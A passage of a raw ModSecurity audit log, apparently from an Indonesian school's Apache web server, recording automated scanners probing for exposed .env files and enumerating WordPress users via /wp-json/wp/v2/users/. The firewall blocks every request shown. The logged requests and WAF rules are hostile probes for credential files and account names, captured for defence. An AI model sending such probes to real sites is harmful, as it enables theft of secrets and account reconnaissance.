(KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: */* --aae6147c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aae6147c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747315823146518 708 (- - -) Stopwatch2: 1747315823146518 708; combined=267, p1=221, p2=0, p3=0, p4=0, p5=46, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aae6147c-Z-- --0f73c70a-A-- [15/May/2025:20:30:24 +0700] aCXscH5oxhgjPv2ZXtnYLwAAAIU 103.236.140.4 49256 103.236.140.4 8181 --0f73c70a-B-- GET /.env.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.117.106.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.117.106.221 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: */* --0f73c70a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f73c70a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747315824994000 704 (- - -) Stopwatch2: 1747315824994000 704; combined=274, p1=240, p2=0, p3=0, p4=0, p5=33, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f73c70a-Z-- --a854d747-A-- [15/May/2025:20:30:25 +0700] aCXscUZPp_O9UFIYjNbB1QAAAMY 103.236.140.4 49258 103.236.140.4 8181 --a854d747-B-- GET /beta/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.117.106.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.117.106.221 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: */* --a854d747-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a854d747-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747315825676815 665 (- - -) Stopwatch2: 1747315825676815 665; combined=248, p1=216, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a854d747-Z-- --982f9c5e-A-- [15/May/2025:20:30:27 +0700] aCXscz0MuKCmW-Q80Ku0bAAAAEI 103.236.140.4 49262 103.236.140.4 8181 --982f9c5e-B-- GET /beta/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.117.106.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.117.106.221 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: */* --982f9c5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --982f9c5e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747315827151021 683 (- - -) Stopwatch2: 1747315827151021 683; combined=272, p1=240, p2=0, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --982f9c5e-Z-- --8da0a110-A-- [15/May/2025:20:30:27 +0700] aCXscz0MuKCmW-Q80Ku0bQAAAE8 103.236.140.4 49266 103.236.140.4 8181 --8da0a110-B-- GET /prod/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.117.106.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.117.106.221 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: */* --8da0a110-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8da0a110-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747315827875816 693 (- - -) Stopwatch2: 1747315827875816 693; combined=266, p1=224, p2=0, p3=0, p4=0, p5=42, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8da0a110-Z-- --7fd1d35f-A-- [15/May/2025:20:30:29 +0700] aCXsde8rcsLSwEaopQLjhAAAABA 103.236.140.4 49270 103.236.140.4 8181 --7fd1d35f-B-- GET /prod/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.117.106.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.117.106.221 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: */* --7fd1d35f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7fd1d35f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747315829047393 670 (- - -) Stopwatch2: 1747315829047393 670; combined=251, p1=219, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7fd1d35f-Z-- --0c4a1207-A-- [15/May/2025:22:36:39 +0700] aCYKB35oxhgjPv2ZXtnb4QAAAJE 103.236.140.4 33878 103.236.140.4 8181 --0c4a1207-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 144.217.68.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 144.217.68.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0c4a1207-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c4a1207-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747323399908481 2986 (- - -) Stopwatch2: 1747323399908481 2986; combined=1297, p1=426, p2=837, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c4a1207-Z-- --aeb05b39-A-- [15/May/2025:22:38:46 +0700] aCYKhu8rcsLSwEaopQLm1wAAAA0 103.236.140.4 33888 103.236.140.4 8181 --aeb05b39-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 209.146.63.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 209.146.63.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --aeb05b39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aeb05b39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747323526857519 3106 (- - -) Stopwatch2: 1747323526857519 3106; combined=1357, p1=420, p2=881, p3=0, p4=0, p5=56, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aeb05b39-Z-- --e8272860-A-- [15/May/2025:22:40:35 +0700] aCYK80ZPp_O9UFIYjNbH2QAAAMc 103.236.140.4 33896 103.236.140.4 8181 --e8272860-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 49.0.46.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 49.0.46.226 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e8272860-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8272860-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747323635152013 2792 (- - -) Stopwatch2: 1747323635152013 2792; combined=1291, p1=428, p2=834, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8272860-Z-- --a397dd61-A-- [15/May/2025:22:51:40 +0700] aCYNjEZPp_O9UFIYjNbH3QAAAMU 103.236.140.4 34002 103.236.140.4 8181 --a397dd61-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.86.192.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.86.192.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a397dd61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a397dd61-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747324300168516 2991 (- - -) Stopwatch2: 1747324300168516 2991; combined=1268, p1=416, p2=823, p3=0, p4=0, p5=29, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a397dd61-Z-- --e86b8531-A-- [15/May/2025:22:56:33 +0700] aCYOsX5oxhgjPv2ZXtndhAAAAJI 103.236.140.4 40992 103.236.140.4 8181 --e86b8531-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.196.176.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.196.176.155 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e86b8531-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e86b8531-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747324593128277 2593 (- - -) Stopwatch2: 1747324593128277 2593; combined=1176, p1=387, p2=759, p3=0, p4=0, p5=30, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e86b8531-Z-- --c44c792d-A-- [15/May/2025:23:05:56 +0700] aCYQ5H5oxhgjPv2ZXtnjBAAAAIM 103.236.140.4 39162 103.236.140.4 8181 --c44c792d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 5.161.42.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 5.161.42.79 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c44c792d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c44c792d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747325156703545 2070 (- - -) Stopwatch2: 1747325156703545 2070; combined=1076, p1=357, p2=693, p3=0, p4=0, p5=25, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c44c792d-Z-- --bcde986a-A-- [15/May/2025:23:14:54 +0700] aCYS_j0MuKCmW-Q80KvJSgAAAFA 103.236.140.4 36946 103.236.140.4 8181 --bcde986a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 52.242.231.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 52.242.231.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --bcde986a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcde986a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747325694124698 2431 (- - -) Stopwatch2: 1747325694124698 2431; combined=1075, p1=347, p2=701, p3=0, p4=0, p5=27, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bcde986a-Z-- --eabcf63f-A-- [15/May/2025:23:32:21 +0700] aCYXFT0MuKCmW-Q80KvUAAAAAE8 103.236.140.4 52810 103.236.140.4 8181 --eabcf63f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 62.240.2.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 62.240.2.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --eabcf63f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eabcf63f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747326741627209 3147 (- - -) Stopwatch2: 1747326741627209 3147; combined=1348, p1=417, p2=893, p3=0, p4=0, p5=38, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eabcf63f-Z-- --b22e4f26-A-- [15/May/2025:23:52:39 +0700] aCYb1z0MuKCmW-Q80KvUKgAAAEE 103.236.140.4 53130 103.236.140.4 8181 --b22e4f26-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 139.5.237.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 139.5.237.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b22e4f26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b22e4f26-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747327959759058 3342 (- - -) Stopwatch2: 1747327959759058 3342; combined=1468, p1=511, p2=925, p3=0, p4=0, p5=31, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b22e4f26-Z-- --8fa16f43-A-- [16/May/2025:00:23:26 +0700] aCYjDn5oxhgjPv2ZXtn92wAAAI0 103.236.140.4 42900 103.236.140.4 8181 --8fa16f43-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 170.64.153.129 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 170.64.153.129 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --8fa16f43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fa16f43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747329806219861 878 (- - -) Stopwatch2: 1747329806219861 878; combined=351, p1=309, p2=0, p3=0, p4=0, p5=42, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fa16f43-Z-- --f6aad40a-A-- [16/May/2025:01:12:31 +0700] aCYujz0MuKCmW-Q80KsJ_QAAAFY 103.236.140.4 47572 103.236.140.4 8181 --f6aad40a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 Accept-Charset: utf-8 --f6aad40a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6aad40a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747332751249856 658 (- - -) Stopwatch2: 1747332751249856 658; combined=295, p1=250, p2=0, p3=0, p4=0, p5=45, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6aad40a-Z-- --c2491b21-A-- [16/May/2025:01:48:53 +0700] aCY3FX5oxhgjPv2ZXtk3AQAAAIg 103.236.140.4 41446 103.236.140.4 8181 --c2491b21-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --c2491b21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2491b21-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747334933064633 700 (- - -) Stopwatch2: 1747334933064633 700; combined=298, p1=261, p2=0, p3=0, p4=0, p5=37, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2491b21-Z-- --b04be177-A-- [16/May/2025:02:03:45 +0700] aCY6kX5oxhgjPv2ZXtlAdwAAAIU 103.236.140.4 55162 103.236.140.4 8181 --b04be177-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.205.46.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.205.46.4 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 